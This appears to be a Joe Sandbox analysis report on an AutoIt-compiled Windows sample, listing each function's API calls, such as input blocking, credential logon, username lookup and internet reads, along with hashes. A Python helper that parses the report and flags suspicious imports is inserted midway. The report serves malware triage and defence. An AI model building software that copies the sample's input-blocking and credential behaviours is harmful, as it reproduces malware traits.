                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                          • String ID:
                                                                          • API String ID: 901099227-0
                                                                          • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                          • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                          APIs
                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Proc
                                                                          • String ID:
                                                                          • API String ID: 2346855178-0
                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
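Added example, not part of the Joe Sandbox report: a small Python triage helper that parses the `APIs` entries in the per-function records above (the `• Name.DLL(args), ref: ADDR` form, plus the argument-less `Name.DLL ref: ADDR` form) and flags the imports worth a second look. The sample input is constructed from lines on this page; the flagging rules are an analyst's heuristics (assumptions), not the report's own verdicts.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample input: "APIs" entries in the Joe Sandbox per-function
# format, copied from the records on this page.
SAMPLE_LINES = """\
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
APIs
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetDesktopWindow.USER32 ref: 00459581
"""


class ApiCall(NamedTuple):
    name: str        # e.g. "BlockInput"
    module: str      # e.g. "USER32"
    args: tuple      # argument strings as printed; "?" means unresolved
    ref: int         # virtual address of the call site


# Matches both "Name.DLL(arg,arg), ref: ADDR" and the argument-less
# "Name.DLL ref: ADDR" form the report uses for GetDesktopWindow.
_API_RE = re.compile(
    r"^\u2022?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; return None for headers and non-API lines."""
    m = _API_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def parse_report(text: str) -> list:
    """Collect every API call entry from a block of report text."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            calls.append(call)
    return calls


# Triage heuristics (analyst assumptions, not part of the report):
# which imports deserve a look and why.
def flag_call(call: ApiCall) -> Optional[str]:
    if call.name == "BlockInput" and call.args[:1] == ("00000001",):
        return "BlockInput(TRUE): locks mouse/keyboard, hinders interactive analysis"
    if call.name == "SetUnhandledExceptionFilter":
        return "custom top-level exception filter: common anti-debugging / crash-handling hook"
    if call.name == "LogonUserW":
        return "LogonUserW: validates credentials / obtains a logon token"
    if call.name == "GetUserNameW":
        return "GetUserNameW: host/user profiling"
    if call.name == "CreateWindowExW" and "AutoIt v3" in call.args:
        return "window titled 'AutoIt v3': AutoIt-compiled stub"
    return None


def flag_calls(calls) -> list:
    """Return (call, reason) pairs for every call a heuristic matches."""
    out = []
    for c in calls:
        reason = flag_call(c)
        if reason:
            out.append((c, reason))
    return out


if __name__ == "__main__":
    for call, reason in flag_calls(parse_report(SAMPLE_LINES)):
        print(f"{call.ref:08X} {call.module}!{call.name}: {reason}")
```

Run it against the saved text of a report and the `ref` addresses give you the call sites to jump to in the memory dump; the heuristic table is the place to add the indicators your own triage cares about.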
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N@
                                                                          • API String ID: 0-1509896676
                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 4040870279-2373415609
                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
